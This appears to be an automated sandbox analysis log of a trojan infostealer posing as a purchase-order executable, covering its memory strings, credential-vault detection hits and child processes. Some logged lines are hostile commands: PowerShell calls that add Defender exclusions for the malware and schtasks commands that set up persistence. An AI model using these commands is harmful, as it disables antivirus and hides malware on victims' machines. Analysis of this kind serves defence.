                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_0506DA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01314A98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01313E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_013141C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0131F8A5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_069A45A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_069A3578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_069AE0B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_069A1030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_069A91E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_069AA140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_069A5D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_069A5650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_069AC358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_069A3C8F
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Code function: 9_2_0109D5BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_00DCA968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_00DC4A98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_00DC3E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_00DC41C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_00DCF8A5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_06145D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_06143578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_061445A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_06140338
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_0614E0B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_0614A140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_061491F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_0614C618
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_06145650
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_06143CA0
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1693602582.00000000025E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000000.1644321898.0000000000196000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenametreesize-8.61-installer_xbs-W52.exe vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1724199163.0000000005B20000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRT.dll. vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1729590315.000000000CF60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1728753559.0000000007703000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXEj% vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1692320796.0000000000868000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe, 00000000.00000002.1693602582.0000000002581000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename8854fa4e-ee03-4899-b0c3-2df80b3f7614.exe4 vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe | Binary or memory string: OriginalFilenametreesize-8.61-installer_xbs-W52.exe vs purchase order - PO-011024-201.exe
                    Source: purchase order - PO-011024-201.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 9.2.jDCErdK.exe.3da9108.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.jDCErdK.exe.3de3b28.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.jDCErdK.exe.3da9108.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, RsYAkkzVoy.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, Kqqzixk.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, xROdzGigX.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, ywes.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, iPVW0zV.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, 1Pi9sgbHwoV.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, YUgDfWK2g4.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, YUgDfWK2g4.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, MarWtcu.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, fsrIvttXdmKqMmWchj.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, fsrIvttXdmKqMmWchj.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, fsrIvttXdmKqMmWchj.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, fsrIvttXdmKqMmWchj.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, fsrIvttXdmKqMmWchj.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, fsrIvttXdmKqMmWchj.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, UAqO0Z5BuvB48Dfytc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, UAqO0Z5BuvB48Dfytc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.purchase order - PO-011024-201.exe.25e0908.4.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
                    Source: 0.2.purchase order - PO-011024-201.exe.2601174.2.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
                    Source: 0.2.purchase order - PO-011024-201.exe.7530000.10.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
                    Source: 0.2.purchase order - PO-011024-201.exe.2598278.1.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@20/25@2/2
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | File created: C:\Users\user\AppData\Roaming\jDCErdK.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
                    Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
                    Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
                    Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
                    Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | File created: C:\Users\user\AppData\Local\Temp\tmpA55D.tmp
                    Source: purchase order - PO-011024-201.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: purchase order - PO-011024-201.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: purchase order - PO-011024-201.exe, 00000000.00000000.1644231926.00000000000A2000.00000002.00000001.01000000.00000003.sdmp, jDCErdK.exe.0.dr | Binary or memory string: INSERT INTO tab_grade (gId, gName) VALUES(NULL, @gName);SELECT @@IDENTITY# Add successfullyInfo%Add unsuccessfully-Grade name not changed
                    Source: purchase order - PO-011024-201.exe | ReversingLabs: Detection: 31%
                    Source: purchase order - PO-011024-201.exe | Virustotal: Detection: 35%
                    Source: purchase order - PO-011024-201.exe | String found in binary or memory: InternalNametreesize-8.61-installer_xbs-W52.exe
                    Source: purchase order - PO-011024-201.exe | String found in binary or memory: OriginalFilenametreesize-8.61-installer_xbs-W52.exe
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | File read: C:\Users\user\Desktop\purchase order - PO-011024-201.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\purchase order - PO-011024-201.exe "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\jDCErdK.exe C:\Users\user\AppData\Roaming\jDCErdK.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp"
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp"
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: cryptsp.dll
